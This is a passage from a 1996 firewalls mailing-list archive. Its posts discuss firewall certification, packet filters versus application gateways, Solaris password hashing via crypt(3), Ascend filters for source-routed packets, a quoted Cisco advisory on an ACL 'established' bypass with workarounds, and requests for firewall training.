evaluation. It is foolishness to think of a firewall as an isolated "black box" that you can somehow test in a clean lab, then plug into your WAN and get security. Security is not about "black boxes" it is a PROCESS that requires UNDERSTANDING and COMMITMENT from management. Many of you (including the guys at NCSA who I've discussed this with!) sense a great deal of ambivalence on my part about their efforts. In one sense I think it is a step forward; in another I think it's a step backward. On one hand we may see some sanity in marketing claims, and on the other, we may see people abrogate their responsibility to THINK about what they are doing when they see a sticker on a firewall. Obviously, they are going to continue to move forward with their project - let's watch and see what happens. The best thing we can contribute is healthy, productive skepticism, and our support* if it looks like they're playing honestly. mjr. (* Oddly enough, I've contributed some effort pro bono to the NCSA project. They've adopted my firewall functional summaries format. I think that's a good thing, but time will tell!) -- Chief Scientist, V-ONE Corporation -- "Security for a connected world" work http://www.v-one.com personal http://www.clark.net/pub/mjr/mjr-top.html From firewalls-owner Mon Jul 1 21:19:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA14171 for firewalls-outgoing; Mon, 1 Jul 1996 21:06:42 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA14164 for ; Mon, 1 Jul 1996 21:06:32 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607020403.VAA19025@mail.marben.com> Subject: Re: /etc/shadow encryption To: vadillo@apu.rcp.net.pe (Enrique Vadillo) Date: Mon, 1 Jul 1996 21:03:40 -0700 (PDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Enrique Vadillo" at Jul 1, 96 09:25:45 pm X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I would like to know if you know where i can get the encryption algorythm > that Sun Solaris 2.5 uses to write its /etc/shadow file. > > I am trying to write some proggy that can let me create users thru email, > i have so many by day!! i want to make this an automated process, > and all i need now is to know the way this encryption is made. If that's really what you want to do, you don't need the algorythm, but just have a look at crypt(3) on all (?) Un*x systems. Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA From firewalls-owner Mon Jul 1 22:19:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA17657 for firewalls-outgoing; Mon, 1 Jul 1996 22:03:49 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id WAA17650 for ; Mon, 1 Jul 1996 22:03:43 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id BAA04053; Tue, 2 Jul 1996 01:00:55 -0400 From: Mike Shaver Message-Id: <199607020500.BAA04053@neon.ingenia.com> Subject: Re: Stateful Packet Screens To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE) Date: Tue, 2 Jul 1996 01:00:55 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9607012013.AA21329@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jul 1, 96 01:13:23 pm X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake Ryan Russell/SYBASE: > This is because > , by their nature, many of them store a signifcant portion of the document > on it's way through, and hence, would make it easier to run through > some script on the proxy server. I don't think that's necessarily `by their nature', although I'll concede that the vast majority of AGs deal with data with larger granularity than the vast majority of SPFs. > This would also be why they would > tend to be slower. I think it's because of: - kernel->user->kernel data copying, since most AGs run in user space. - doing more complex analysis/manipulation of the data, which obviously takes more CPU time. (This includes the AG's TCP, if any.) > I suspect that one will have a much > easier time > allowing a new type of service on a SPF than an AG. Warning: ports are not always related to services/protocols in a 1-to-1 way. Current SPFs only really look at port and protocol info, so you can easily end up letting something through that wasn't intended, if the port->application mapping isn't what you think it is. > Are there proxies that are as transparent as something like FW1? You can make a transparent proxy (which is probably closer to an AG than an SPF, by traditional behavioural criteria) which requires no change to the client configuration. Usually requires kernel support, I think. Mike -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> UNIX medicine man -- dark magick, cheap! <# #> <# #> When the going gets tough, the tough give cryptic error messages. <# #> "We believe in rough consensus and running code." <# From firewalls-owner Tue Jul 2 02:04:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA28079 for firewalls-outgoing; Tue, 2 Jul 1996 01:58:02 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA28063 for ; Tue, 2 Jul 1996 01:57:52 -0700 (PDT) Message-Id: <199607020857.BAA28063@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: Stateful Packet Screens To: shaver@neon.ingenia.ca (Mike Shaver) Date: Tue, 2 Jul 1996 18:54:52 +1000 (EST) Cc: Ryan.Russell@sybase.com, firewalls@GreatCircle.COM In-Reply-To: <199607020500.BAA04053@neon.ingenia.com> from "Mike Shaver" at Jul 2, 96 01:00:55 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Mike Shaver, sie said: > > Thus spake Ryan Russell/SYBASE: > > This is because > > , by their nature, many of them store a signifcant portion of the document > > on it's way through, and hence, would make it easier to run through > > some script on the proxy server. > > I don't think that's necessarily `by their nature', although I'll > concede that the vast majority of AGs deal with data with larger > granularity than the vast majority of SPFs. Dealing with a 1MB e-mail is going to be difficult, in kernel space. > > This would also be why they would > > tend to be slower. > > I think it's because of: > - kernel->user->kernel data copying, since most AGs run in user space. > - doing more complex analysis/manipulation of the data, which > obviously takes more CPU time. (This includes the AG's TCP, if any.) I think the later more than the first (re. zero-copy TCP at Usenix '96 having noticable but not huge, performance gains), especially if they're putting stuff on disk (I guess virtual memory must be a consideration here too). > Warning: ports are not always related to services/protocols in a > 1-to-1 way. Current SPFs only really look at port and protocol info, > so you can easily end up letting something through that wasn't > intended, if the port->application mapping isn't what you think it is. FW-1 is a bit more advanced: it snoops RPC traffic and learns about RPC services that way rather than any configuration file. Darren From firewalls-owner Tue Jul 2 02:34:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA27806 for firewalls-outgoing; Tue, 2 Jul 1996 01:50:40 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA27791 for ; Tue, 2 Jul 1996 01:50:28 -0700 (PDT) Message-Id: <199607020850.BAA27791@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: firewall certification (was Re: NCSA) To: mjr@v-one.com Date: Tue, 2 Jul 1996 18:47:34 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607020127.VAA26749@explorer2.clark.net> from "Marcus J. Ranum" at Jul 1, 96 09:27:45 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Marcus J. Ranum, sie said: > > [This is no longer particularly related to NCSA, so it > should not be taken as criticism or praise for their business.] > > I'm very cynical about the whole notion of firewall > certification, as many of you have noted. Mostly, it's because > it's nearly impossible to find an unbiassed source. For example, > the federal government's various agencies have several times > tried to publish firewall recommendations but whenever they > do, they get slammed and threatened with lawsuits by the > vendors that feel they are slighted. There are probably all > kinds of goofy procurement rules that further tie the hands > of government agencies, with respect to making comments. [...] On the topic of Government recommendations, the Australian Government has a "Firewall Requirements" document (a copy of which is hopefully going to get to me some time this century), which I think is an interesting way of approaching the "is it good enough ?" problem. What's more, I seem to get rather interesting advertising material from a local reseller of ISS's scanner which points out that a number of commerical firms which do auditting and consulting use it to verify or audit firewalls. Whilst it is a start, it is by no means comprehensive and reading the document, the way it is sold for such a purpose borders on the ridiculous. It can quite easily lead to a false sense of security, irrespective of how up-to-date it is with current patches and bugs. How secure the firewall itself is does not necessarily have anything to do with how well it protects your network. Darren From firewalls-owner Tue Jul 2 03:04:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA02117 for firewalls-outgoing; Tue, 2 Jul 1996 02:49:49 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA02042 for ; Tue, 2 Jul 1996 02:49:21 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id LAA12235; Tue, 2 Jul 1996 11:47:10 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607020945.AA17027@tidtest.total.fr> To: vadillo@apu.rcp.net.pe (Enrique Vadillo) Cc: firewalls@greatcircle.com Subject: Re: /etc/shadow encryption In-Reply-To: Your message of "Mon, 01 Jul 1996 21:25:45 EDT." X-Cuse: "The dog ate my network" Date: Tue, 02 Jul 1996 11:45:40 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message , Enrique Vadillo writes: > > I am trying to write some proggy that can let me create users thru email, > i have so many by day!! i want to make this an automated process, > and all i need now is to know the way this encryption is made. > Will you post the mailbot address on the list when you're done ? :-) Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Tue Jul 2 03:19:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA03334 for firewalls-outgoing; Tue, 2 Jul 1996 03:02:27 -0700 (PDT) Received: from gemsgw.med.ge.com ([192.88.230.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA03305 for ; Tue, 2 Jul 1996 03:02:10 -0700 (PDT) Received: from gemed.med.ge.com (gemed.med.ge.com [3.7.12.4]) by gemsgw.med.ge.com (8.6.12/8.6.12) with ESMTP id EAA12464; Tue, 2 Jul 1996 04:57:19 -0500 Received: from wiproge.med.ge.com (jogin [3.70.200.53]) by gemed.med.ge.com (8.6.12/8.6.12) with SMTP id EAA02507; Tue, 2 Jul 1996 04:57:20 -0500 Received: from ashwini.wiproge.med.ge.com by wiproge.med.ge.com (4.1/SMI-4.1) Received: by ashwini.wiproge.med.ge.com (SMI-8.6/SMI-SVR4) Date: Tue, 2 Jul 1996 15:28:36 -0500 From: sameer@wiproge.med.ge.com (Sameer ) Message-Id: <199607022028.PAA19968@wiproge.med.ge.com> To: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe Subject: Re: /etc/shadow encryption X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Why do u need the passwd algo for that? Solaris allows u to create a user w/o passwd and then let the user create passwd while logging. ....sam *SAM*From firewalls-owner@GreatCircle.COM Tue Jul 2 09:26:19 1996 *SAM*From: vadillo@apu.rcp.net.pe (Enrique Vadillo) *SAM*Subject: /etc/shadow encryption *SAM*To: firewalls@GreatCircle.COM *SAM*Date: Mon, 1 Jul 1996 21:25:45 -0400 (EDT) *SAM* *SAM*Hello all! *SAM* *SAM*I would like to know if you know where i can get the encryption algorythm *SAM*that Sun Solaris 2.5 uses to write its /etc/shadow file. *SAM* *SAM*I am trying to write some proggy that can let me create users thru email, *SAM*i have so many by day!! i want to make this an automated process, *SAM*and all i need now is to know the way this encryption is made. *SAM* *SAM*Thanks in advance, *SAM*-- *SAM* Enrique Vadillo Research & Development at RCP *SAM* http://www.rcp.net.pe fax : +51 1 241-1320 *SAM* Peruvian Internet Gateway work: +51 1 954-4799 *SAM* From firewalls-owner Tue Jul 2 05:49:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA12268 for firewalls-outgoing; Tue, 2 Jul 1996 05:38:17 -0700 (PDT) Received: from webster.your.net (webster.your.net [205.133.197.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA12250 for ; Tue, 2 Jul 1996 05:38:06 -0700 (PDT) Received: from web-server by webster.your.net via SMTP (940816.SGI.8.6.9/50810.SGI) Message-Id: <2.2.32.19960702073748.002bfdb0@CFConsulting.com> X-Sender: cfry@CFConsulting.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 08:37:48 +0100 To: Firewalls@GreatCircle.COM From: Charles C Fry Subject: On Guard Experiences? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for some feedback (good and bad) on the firewall called On Guard. Users who have it fw'ing IPX nets would be appreciated as well as folks uning it for Internet firewalling. Thanks. ====================================================================== = Charles Fry Consulting == Helping Retail & Direct Marketing = = New Albany, Ohio == Companies Harness Technology for = = (614) 855-3925 == Greater Profit and Market Advantage = = cfry@CFConsulting.com == http://www.CFConsulting.com = ====================================================================== From firewalls-owner Tue Jul 2 06:34:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14150 for firewalls-outgoing; Tue, 2 Jul 1996 06:19:57 -0700 (PDT) Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA14131 for ; Tue, 2 Jul 1996 06:19:49 -0700 (PDT) Received: from linda.if.is by isgate.is (8.7.5-M/ISnet/14-10-91); Tue, 2 Jul 1996 13:17:06 GMT Received: by linda.if.is (Secure/IFnet/26-04-96); Tue, 2 Jul 1996 13:17:04 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199607021317.NAA10567@linda.if.is> Subject: Reading news via a firewall To: firewalls@GreatCircle.com Date: Tue, 2 Jul 1996 13:17:04 +0000 (GMT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for a simple solution for reading news via a firewall. I've a Linux firewall set up on our local network and lot of PCs running Win 3.x, Win95 and/or WinNT Workstations on the protected network. The problem is that the machines on the protected network must be able to read news via/through the firewall at the news host. Is there a simple/good solution for a Linux firewall? A gateway or something? If so, what news agents do support that gateway solution? Hope someone can help me, best regards, Gunni .------. | News | `------' | | ---Firewall--- | | `-------------Protected network ========================================================================= Gunnar Ingvi Thorisson E-Mail address: gunni@if.is System administrator Iceland Software Inc. Sudurlandsbraut 4, IS-108 Reykjavík, Iceland Phone: (+354) 588-1511 Fax: (+354) 588-8728 ========================================================================= From firewalls-owner Tue Jul 2 06:49:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14642 for firewalls-outgoing; Tue, 2 Jul 1996 06:26:43 -0700 (PDT) Received: from drawbridge.ascend.com (drawbridge.ascend.com [198.4.92.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA14635 for ; Tue, 2 Jul 1996 06:26:37 -0700 (PDT) Received: from spud.ascend.com (fw-ext.ascend.com [198.4.92.5]) Received: from Mail-gw.ascend.com (mail-gw.ascend.com [192.207.23.142]) Received: by Mail-gw.ascend.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) Message-Id: <9607021322.AA1707@Mail-gw.ascend.com> Received: from Ascend with "Lotus Notes Mail Gateway for SMTP" id To: Full Name Field Cc: firewalls From: Gary Wong/Ascend/US Date: 2 Jul 96 6:22:20 Subject: Re: source routing and Ascend P50 Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank : The filter rules are as below : Input Filter 1 : Generic... Forward = No Offset = 34 Length = 1 Mask = FF00000000000000 Value = 8300000000000000 #loose source route Compare = Equals More = No Input Filter 1 : Generic... Forward = No Offset = 34 Length = 1 Mask = FF00000000000000 Value = 8900000000000000 #strict source route Compare = Equals More = No These filters will discard incoming packets with sourece route option.(ex:traceroute -g or traceroute -G) Gary Wong Ascend Communications Inc. ------------------------------------------------------------------------------------------------------------- wall @ readybox.com (Full Name Field) 06/30/96 10:14 AM To: firewalls @ GreatCircle.COM @ Internet cc: Subject: source routing and Ascend P50 I have an Ascend Pipeline 50 router and would like to kill all incoming source-routed packets. 1) Is it possible to filter source-routed packets with a P50? 2) If so, can anyone provide an example of such a filter rule? I've spent some time on the phone with Ascend in an attempt to answer these questions. In that hunt, I spoke with four support people, none of whom were familiar with the concept of source routing. (That was, in itself, a little disturbing.) I tried to explain what source routing was and why it was of interest, but I never did get any useful responses. --------------------------- Frank McCormick From firewalls-owner Tue Jul 2 07:38:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18555 for firewalls-outgoing; Tue, 2 Jul 1996 07:17:42 -0700 (PDT) Received: from c2smtp.on.com (c2smtp.on.com [207.18.216.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA18527 for ; Tue, 2 Jul 1996 07:17:33 -0700 (PDT) Received: from Connect2 Message Router by c2smtp.on.com Message-ID: Date: Tue, 2 Jul 1996 10:20:00 -0500 From: David Tate Organization: On Technology To: firewalls@greatcircle.com Subject: Training??? MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-Mailer: Connect2-SMTP 4.01.b32G MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for IS Security/Firewalling/Network Protection training in MA, in the month of July. Would anyone be able to recommend such training? From firewalls-owner Tue Jul 2 07:54:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19970 for firewalls-outgoing; Tue, 2 Jul 1996 07:38:47 -0700 (PDT) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19951 for ; Tue, 2 Jul 1996 07:38:36 -0700 (PDT) Received: from pferguso-pc.cisco.com ([171.68.83.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id HAA27981; Tue, 2 Jul 1996 07:36:17 -0700 Message-Id: <199607021436.HAA27981@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 10:35:14 -0400 To: "Russell L. Jones" From: Paul Ferguson Subject: Re: Cisco Router security Cc: "'firewalls@GreatCircle.COM'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:38 PM 7/1/96 -0400, Russell L. Jones wrote: >What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks? > The only one that I'm aware of is the fragmentation problem when the ACK bit is set with 'established' parameter [below]. - paul [snip] Cisco Security Advisory ----------------------- Thu Jun 1 16:27:08 PDT 1995 The following describes a vulnerability in Cisco's IOS software when the 'established' keyword is used in extended IP access control lists. This bug can, under very specific circumstances and only with certain IP host implementations, allow unauthorized packets to circumvent a filtering router. This vulnerability is present in the following IOS software versions: 10.3(1) through 10.3(2) 10.2(1) through 10.2(5) 10.0(1) through 10.0(9) and all previous versions of Cisco software. If you are running any of these IOS versions on a product that uses IP extended access lists, and you are using the 'established' keyword in these lists, then Cisco strongly recommends that you take immediate action to remove the vulnerability. You can determine what version of IOS you are running by issuing the following command: show version The recommended action is to upgrade to a more recent version of IOS, or take one of the immediate workaround actions described below. The vulnerability is fixed by in the following official software releases: 10.0(10) or later 10.2(6) or later 10.3(3) or later (For reference, the Cisco update identifier for this fix is "CSCdi34061".) Customers may obtain software upgrades without going through the Cisco's Technical Assistance Center via Cisco's Customer Information On-Line service, instructions for downloading are available at the end of this message. You may also contact your Cisco distributor or contact Cisco's Technical Assistance Center (TAC) for more information. TAC can be reached by phone at 800-553-2447, by E-Mail to tac@cisco.com or via the World-Wide-Web at http://www.cisco.com. In Europe you can contact TAC by phone at 32-2-778-42-42 or via E-Mail to euro-tac@cisco.com. - ---------------------------------------------------------------------------- A) Description A bug in Cisco's extended IP access list implementation can, under very specific circumstances, allow a user to bypass IP packet filtering. This may permit unintended IP traffic to pass through your firewall setup. To determine if you are vulnerable, look through your configuration. The configuration can be displayed by enabling and then entering the command "write term". If you see an access list line using a list number in the range of 100 through 199 that permits or denies TCP traffic and contains the word 'established' near the end of the line, you may be vulnerable. An example line might look like: In IOS 10.3: access-list 100 permit tcp any any established In IOS 10.2 or earlier: access-list 100 permit tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 established If you do not meet this test, then you are not vulnerable. You do not need to do anything. B) Workaround The following actions will remove the vulnerability: - Rewrite the access list parameters so the 'established' keyword is not necessary. This does not simply mean that you may remove the 'established' keyword, but rather that you will need to re-design your access lists to provide similar functionality without using the established mechanism. or - Disable the interfaces to which the access list is applied using the 'shutdown' interface subcommand: example: router(config)#interface ethernet 0 router(config-if)#shutdown C) Solution Obtain and install the appropriate release of IOS software as described above. For assistance contact Cisco's TAC. D) Technical Comments This problem is caused by an obscure but common design flaw, that we believe, exists in many router/firewall vendor's packet filtering implementations. Owners of non-Cisco hardware who use IP packet filtering features similar to Cisco's "extended access lists" as part of a firewall system may wish to contact their vendor to confirm that this vulnerability does not exist in their system. (Technical discussions about the problem have already occured in the appropriate forum.) This vulnerability can only be exploited with certain IP host implementations (we do not have information on which implementations are susceptible). Cisco suggests that all routers configured to filter IP packets based upon the 'established' mechanism be upgraded. [snip] -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jul 2 08:04:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18862 for firewalls-outgoing; Tue, 2 Jul 1996 07:21:28 -0700 (PDT) Received: from Hydro.CAM.ORG (Hydro.CAM.ORG [198.168.100.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA18855 for ; Tue, 2 Jul 1996 07:21:22 -0700 (PDT) Received: from Stratus.CAM.ORG (cyberia@Stratus.CAM.ORG [198.168.100.6]) by Hydro.CAM.ORG (8.7.5/8.7.3) with ESMTP id KAA28820; Tue, 2 Jul 1996 10:18:22 -0400 (EDT) Received: from localhost (cyberia@localhost) by Stratus.CAM.ORG (8.7.5/8.7.3) with SMTP id KAA23366; Tue, 2 Jul 1996 10:18:13 -0400 (EDT) X-Authentication-Warning: Stratus.CAM.ORG: cyberia owned process doing -bs Date: Tue, 2 Jul 1996 10:18:11 -0400 (EDT) From: CyberEyes To: Sameer cc: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe Subject: Re: /etc/shadow encryption In-Reply-To: <199607022028.PAA19968@wiproge.med.ge.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jul 1996, Sameer wrote: > Why do u need the passwd algo for that? Solaris allows > u to create a user w/o passwd and then let the user create passwd while logging. Would you know if there is a way to do what you just described above, but I don't have access to root? Obviously the user would not have any privs, but is it possible? Ryan A. Rowe - Montreal, Quebec aka CyberEyes, Rubik'S Cube Tel. -> +1-514-626-0328 | __o o E-Mail -> cyberia@cam.org | _ \<_ <\ WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> IRC -> #CAli4NiA, #Triathlon, #Surfing | FTP -> ftp.cam.org /users/cyberia | swim bike run /Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998." From firewalls-owner Tue Jul 2 08:19:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22829 for firewalls-outgoing; Tue, 2 Jul 1996 08:14:54 -0700 (PDT) Received: from eagle.twinds.com (eagle.twinds.com [206.153.22.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA22799 for ; Tue, 2 Jul 1996 08:14:45 -0700 (PDT) Received: from hawk.twinds.com by eagle.twinds.com with SMTP Date: Tue, 2 Jul 1996 11:16:25 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: mjr@v-one.com Cc: Firewalls@GreatCircle.COM Subject: Re: Catapault firewall In-Reply-To: <199607020139.VAA27764@explorer2.clark.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, Marcus J. Ranum wrote: > The brief on Microsoft's page is completely content-free. > Several times, Catapult is recommended as the solution because > it's secure. Nothing about why it's secure or how it's secure. > Don't bother your head with that stuff! It's SECURE, OK? Nike's slogan: Just do it! Microsoft's Slogan: Just use it! Cheers: -arc Arley Carter Tradewinds Technologies, Inc. email: ac@hawk.twinds.com www: http://www.twinds.com "Trust me. This is a secure product. I'm from ." From firewalls-owner Tue Jul 2 08:20:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18977 for firewalls-outgoing; Tue, 2 Jul 1996 07:23:14 -0700 (PDT) Received: from dfw-ix1.ix.netcom.com (dfw-ix1.ix.netcom.com [206.214.98.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA18970 for ; Tue, 2 Jul 1996 07:23:08 -0700 (PDT) Received: from larry-s-pc (nyc-ny29-09.ix.netcom.com [207.92.153.137]) by dfw-ix1.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA06184 for ; Tue, 2 Jul 1996 07:20:24 -0700 Message-Id: <1.5.4.32.19960702161706.0068f028@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 10:17:06 -0600 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Firewall training Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all, As the person charged with getting my organization connected to the Internet, I have done research on firewalls, network security practices, host security practices and other related tasks. (Looked at application proxies, virus scanners, use trackers, packet filters (including the "stateful" kind), etc., etc.) I plan to have our 2 sites, in NY and Denver, connected using the same national ISP, but with the same domain name. Naturally, there will be a firewall at each location. *Question*: Other than the training that the firewall vendor offers to manage their product, and general training in TCP/IP, what other training should the groups who will manage these firewalls take? Each site will have a LAN group (primarily with Novell expertise and some prior UNIX training) that will "own" the firewall administration. We do have a central security group, but they are not staffed to handle this new job, although they will set the administrative standards for the firewall. The firewall will be UNIX based, as will the other associated products (virus scanner, etc.). Any suggestions (particularly specific training courses) will be much appreciated. Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. ++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 08:26:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19175 for firewalls-outgoing; Tue, 2 Jul 1996 07:26:31 -0700 (PDT) Received: from dfw-ix4.ix.netcom.com (dfw-ix4.ix.netcom.com [206.214.98.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19150 for ; Tue, 2 Jul 1996 07:26:23 -0700 (PDT) Received: from larry-s-pc (nyc-ny29-09.ix.netcom.com [207.92.153.137]) by dfw-ix4.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA16775 for ; Tue, 2 Jul 1996 07:23:00 -0700 Message-Id: <1.5.4.32.19960702161943.0066c30c@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 10:19:43 -0600 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Firewall training Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello All, As the person charged with getting our company connected to the Internet, I have done research on firewalls, ISPs, host security, network security, etc., and have a fair idea of what is required, but I do have a question. Some background: I am planning on connecting our 2 sites, NY and Denver, with connections from the same national ISP using the same domain name (e-mail will go through one site only, however) The services will be pretty straightforward, allowing HTTP, FTP, NNTP and SMTP out, and only SMTP in. Each site will, naturally, have its own firewall. There will also be other related security products like a virus scanner at each site. The groups that will administer the firewalls will be the LAN group at each location. They have Novell expertise primarily, but some UNIX background also. The central security group does not have the staff to manage the firewall in each location, but will probably set the standards and procedures. *Question*: Other than the training offered by the firewall vendor to manage their product, and general background training in TCP/IP, what kind training should the individuals in these groups have? Although these people have some familiarity with the Internet, nobody has ever managed a firewall before. Any suggestions will be much appreciated (particularly if you have a specific course in mind). Thanks Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. ++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 08:34:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23453 for firewalls-outgoing; Tue, 2 Jul 1996 08:20:27 -0700 (PDT) Received: from kremvax.demos.su (kremvax.demos.su [194.87.0.20]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA23431 for ; Tue, 2 Jul 